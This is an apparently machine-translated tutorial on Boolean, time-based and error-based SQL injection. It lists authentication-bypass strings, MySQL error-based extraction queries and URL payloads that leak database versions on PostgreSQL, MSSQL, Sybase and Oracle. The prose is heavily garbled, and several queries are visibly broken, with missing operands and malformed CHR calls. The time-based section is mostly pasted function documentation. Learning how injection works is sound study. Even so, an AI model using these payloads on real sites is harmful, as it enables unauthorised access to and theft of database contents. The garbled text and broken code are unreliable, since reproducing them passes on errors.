Classification learning is advantageous to the physical and chemical knowledge, the approximate SQL injection is divided into three kinds:
1.BealeanBase
2.TimeBase
3.ErrorBase
1. From the simplest, Boolean-based types are the most common SQL injection methods
Select username, password from tb_admin where username= User and password = Pass;
In this case, if the extracted validation data is used, there will be a hole in the Boolean injection specifically as follows
' Select username, password from tb_admin where username= ' + User + ' and password = ' + Pass;
It appears that the user name and password for the specification above and below will have the correct query to occur, and are all queries that accurately reflect the data values of the database, but if I pass in the following parameters
User name Input: 1 ' or ' 1 ' = ' 1
Password: 1 ' or ' 1 ' = ' 1
This is embedded in the original statement is ' Select username, password from tb_admin where username= ' 1 ' or ' 1 ' = ' 1 ' and password = ' 1 ' or ' 1 ' = ' 1 ';
In this case, the select or a permanent, so that the result of select return is always true, further through validation, however, in fact, this boolean-based SQL injection is becoming less, because
Only beginners will do this, but this principle still needs to be known.
Injection reason: The user input parameters are not verified, directly splicing into SQL query, resulting in user-submitted data carefully as code execution, further to achieve the purpose of bypassing authentication
Workaround: Do not trust any input from the user, all user input must be escaped and reused
2. Time-based injection:
This method is a little wretched, according to the topic know that it is to be based on the return time to judge the results of the implementation, but if the network is not good, it is not good to judge
As far as MySQL is concerned, the two functions involved are sleep () and benchmark (), but the latter takes up a higher cup, so it is not recommended to use
Syntax:
SLEEP (Duration)
Sleeps (pauses) for the number of seconds given by the duration
Argument, then returns 0. If SLEEP () is interrupted, it returns 1. The
Duration May has a fractional part given in microseconds.
Read the syntax of sleep () to know, is a time-lapse effect of execution
Find_in_set (Str,strlist)
Returns a value in the range of 1 to N if the string str are in the
String list strlist consisting of N substrings. A string list is a
String composed of substrings separated by "," characters. If the first
argument is a constant string and the second is a column of type SET,
The Find_in_set () function is a optimized to use bit arithmetic. Returns
0 if STR is not in strlist or if Strlist is the empty string. Returns
Null if either argument is null. This function does not work properly
If the first argument contains a comma (",") character.
This function is the process of finding Str in strlist, returning the number found
3. Error-Based Blinds
is through the Web site display of the database and other error information to step into the depth, when the binary lookup of a 32-bit hash value needs to 16x32=512 times (16 binary hash character, a total of 16 possible), but also some
Can reduce the number of queries, the probability that the number of letters in English is known: e,t,a,o,i,n,s,h,r,d,l,c,u,m,w,f,g,y,p,b,v,k,j,x,q,z
It's much more efficient to try and then do a binary search based on the order in front and back.
This is an error based on the copy entry point.
Select, union SELECT COUNT (*), concat (version (), Floor (rand (0) *)) x from Information_schema.tables Group by X;
/* SQL Error (1062): Duplicate entry ' 5.5.171 ' for key ' group_key ' * *
If the key table is disabled, there are also errors that can trigger:
Select COUNT (*) from (SELECT 1 Union SELECT NULL UNION SELECT! 1) Group by concat (version (), Floor (rand (0)))
/* SQL error (1248): Every derived table must has its own alias */
If some of the key functions, such as RAND (), are disabled, you can do the following:
Select min (@a:=1) from Information_schema.tables Group by concat (password,@a:= (@a+1)%2)
/* SQL Error (1054): Unknown column ' password ' in ' group statement ' * *
These are MySQL database design problems, so the above statement does not apply to other databases.
In MySQL 5.1 and later versions are added two new XML functions, can be used to error:
Extractvalue (), Updatexml ()
In other databases, you can use different methods to make an error.
PostgreSQL:/?param=1 and (1) =cast (version () as numeric)--
MSSQL:/?param=1 and (1) =convert (int,@ @version)--
Sybase:/?param=1 and (1) =convert (int,@ @version)--
Oracle >=9.0:/?param=1 and (1) = (select Upper (XMLType (Chr (60) | | Chr (58) | | Chr (58) | | (SELECT
Replace (BANNER,CHR (+), CHR) from sys.v_$version where rownum=1) | | CHR)) from dual)--
SQL Injection Summary